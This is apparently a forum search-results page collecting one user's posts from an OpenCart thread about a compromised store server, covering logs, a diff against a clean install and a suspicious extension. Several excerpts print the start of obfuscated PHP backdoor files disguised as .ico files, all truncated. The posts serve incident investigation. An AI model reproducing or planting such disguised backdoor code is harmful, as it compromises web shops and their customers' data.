Search found 111 matches

Search found 111 matches

Re: Ongoing Attack Stealing Credit Cards From Over A Hundred Shopping Sites

You must be on shared hosting if you have to ask, no thanks. Seems like a lot of wasted time, but if you're bored have at it!

Jump to post
  • Fri May 24, 2019 9:58 pm
  • Replies 6
  • Views 324
Re: 3.02_conf running and running...?

Ok, doesn't seem like the normal case though. My 2 cents would be that things like base64_decode or gzinflate or curl should be locked out by default for extensions. Someone should have to change a config file on the backend to enable some PHP functions for extensions to use, majority of them don't ...

Jump to post
  • Tue May 14, 2019 10:37 am
  • Replies 47
  • Views 1152
Re: 3.02_conf running and running...?

Is there any good reason for an extension to ever use : base64_decode or gzinflate
Because this could have been blocked at the front door if the extension installer stopped the install as soon as it saw these in the code.

Jump to post
  • Mon May 13, 2019 8:04 pm
  • Replies 47
  • Views 1152
Re: 3.02_conf running and running...?

I already kicked up a whole new server on a different IP and installed OC on it many days ago. No worries there. And I had disabled SELinux on that server, didn't want to mess around configuring it since I am still unsure if I will move to OC anyway. It was all just a test server for me. I see now t...

Jump to post
  • Mon May 13, 2019 6:32 pm
  • Replies 47
  • Views 1152
Re: 3.02_conf running and running...?

mostof todays Badcode no longer hurts a well-done XP ;) Too funny! Hello, Detection is correct: HEUR:Trojan.Linux.Agent.go Best regards, Alexander Al. Kolesnikov, Malware Analyst, Kaspersky Lab --- https://www.google.com/search?q=HEUR%3ATrojan.Linux.Agent.go&ie=utf-8&oe=utf-8 --- So what does it do...

Jump to post
  • Mon May 13, 2019 8:50 am
  • Replies 47
  • Views 1152
Re: 3.02_conf running and running...?

IP_CAM wrote:
Mon May 13, 2019 4:32 am
File sent to Kapersky Lab. (Name changed, to make passing my Firewall possible... ;) )
So you were hit with it too?

Jump to post
  • Mon May 13, 2019 4:47 am
  • Replies 47
  • Views 1152
Re: 3.02_conf running and running...?

Pretty sure I see what happened now. I have full backups of the server at random dates. I just took backups when I remembered, usually after I made progress with this OC install project. Ironically I seem to have caught this nasty script at the point where it was installed on the server through the ...

Jump to post
  • Mon May 13, 2019 4:11 am
  • Replies 47
  • Views 1152
Re: 3.02_conf running and running...?

And here's another hacked opencart that is not me, that's now 3 known with this Original post: https://opencartforum.com/topic/136313-vzlomali-opencart/?do=getNewComment Translated: https://translate.google.com/translate?hl=en&sl=ru&u=https://opencartforum.com/topic/136313-vzlomali-opencart/%3Fdo%3D...

Jump to post
  • Sun May 12, 2019 7:13 pm
  • Replies 47
  • Views 1152
Re: 3.02_conf running and running...?

Staring at more logs - I see that the file upload extension must have been installed on April 4th because there are errors with the upload file formats noted in the OC log. Looking back at the apache logs, the first log isn't until April 7th which explains why I don't see the install of the extension.

Jump to post
  • Sun May 12, 2019 12:25 pm
  • Replies 47
  • Views 1152
Re: 3.02_conf running and running...?

all that call does is retrieve: Welcome to the Export/Import Tool (V3.20) for OpenCart. If you need a customized version, <a href="http://www.mhccorp.com/index.php?route=information/contact"><u>let us know</u></a> and we can create one for a charge. I suspect you have a hosting security issue, not ...

Jump to post
  • Sun May 12, 2019 11:24 am
  • Replies 47
  • Views 1152
Re: 3.02_conf running and running...?

I did post a couple encrypted files, but odd you call log files unreadable? Odd you call that last chunk of code I posted unreadable? And it was noted in a previous post that an extension shouldn't phone home, when here is clearly code phoning home.

Jump to post
  • Sun May 12, 2019 9:34 am
  • Replies 47
  • Views 1152
Re: 3.02_conf running and running...?

And I am looking at the install zip, here is something interesting -- protected function curl_get_contents($url) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $output = curl_exec($ch); curl_close($ch); retu...

Jump to post
  • Sat May 11, 2019 11:13 pm
  • Replies 47
  • Views 1152
Re: 3.02_conf running and running...?

Ok, now thinking back to the apache log I posted above. Because of the dates on the binary files, the extension would have to be from these apache logs - 193.169.87.26 - - [10/Apr/2019:15:39:47 +0000] "POST /admin/index.php?route=marketplace/installer/upload&user_token=f8NiIn6RVtualcsX1njyLhavDSqXW0...

Jump to post
  • Sat May 11, 2019 11:07 pm
  • Replies 47
  • Views 1152
Re: 3.02_conf running and running...?

So I took the new clean install, tar'd it, transferred it to the infected server, un-tar'd it and ran diff to see the difference. Taking out the thousands of images, I get this Only in html/admin: 3.02_conf Files html/admin/config.php and clean/admin/config.php differ Only in html/admin/controller/c...

Jump to post
  • Sat May 11, 2019 10:02 pm
  • Replies 47
  • Views 1152
Re: 3.02_conf running and running...?

[root@opencart system]# cat /var/www/html/system/xtnidjzx.php <?php $bkrpkdl = '*glcxu7n#r8-\'29mtv64_isebyofkda13pH5';$rykhs = Array();$rykhs[] = $bkrpkdl[34].$bkrpkdl[0];$rykhs[] = $bkrpkdl[3].$bkrpkdl[10].$bkrpkdl[13].$bkrpkdl[32].$bkrpkdl[32].$bkrpkdl[18].$bkrpkdl[27].$bkrpkdl[10].$bkrpkdl[11]....

Jump to post
  • Sat May 11, 2019 9:19 pm
  • Replies 47
  • Views 1152
Re: 3.02_conf running and running...?

[code][root@opencart system]# cat .c2ea66bb.ico <?php $_l8q09b = basename/*axn*/(/*iz*/trim/*x*/(/*m1*/preg_replace/*9gy*/(/*27sqp*/rawurldecode/*8zh10*/(/*y8*/"%2F%5C%28.%2A%24%2F"/*i7was*/)/*2mb3*/, '', __FILE__/*2*/)/*rfqn*//*4b3*/)/*y*//*ot*/)/*nzc*/;$_zinlrm = "G%05%12M%40RS%04%0B%40%0C%07G%09...

Jump to post
  • Sat May 11, 2019 9:18 pm
  • Replies 47
  • Views 1152
Re: 3.02_conf running and running...?

[root@opencart system]# cat .798c18ee.ico <?php $_udfcv9j = basename/*j*/(/*rpq*/trim/*0k7*/(/*nr*/preg_replace/*veih*/(/*xu*/rawurldecode/*zl802*/(/*rwx2*/"%2F%5C%28.%2A%24%2F"/*7hibw*/)/*916*/, '', __FILE__/*jlo*/)/*n*//*i7p*/)/*1d*//*w*/)/*o9g*/;$_rla6c = "GQ%19%10BU%5D%03%0C%40%0C%07G%09DMJ%06P...

Jump to post
  • Sat May 11, 2019 9:18 pm
  • Replies 47
  • Views 1152
Re: 3.02_conf running and running...?

Well this is interesting... [root@opencart system]# ls -lha /var/www/html/system total 112K drwxr-xr-x. 6 apache apache 223 May 10 19:37 . drwxr-xr-x. 6 root root 144 May 1 21:45 .. -rw-r--r-- 1 apache apache 30K Dec 3 01:01 .798c18ee.ico -rw-r--r-- 1 apache apache 33K Jan 14 02:45 .c2ea66bb.ico drw...

Jump to post
  • Sat May 11, 2019 9:16 pm
  • Replies 47
  • Views 1152

Search found 111 matches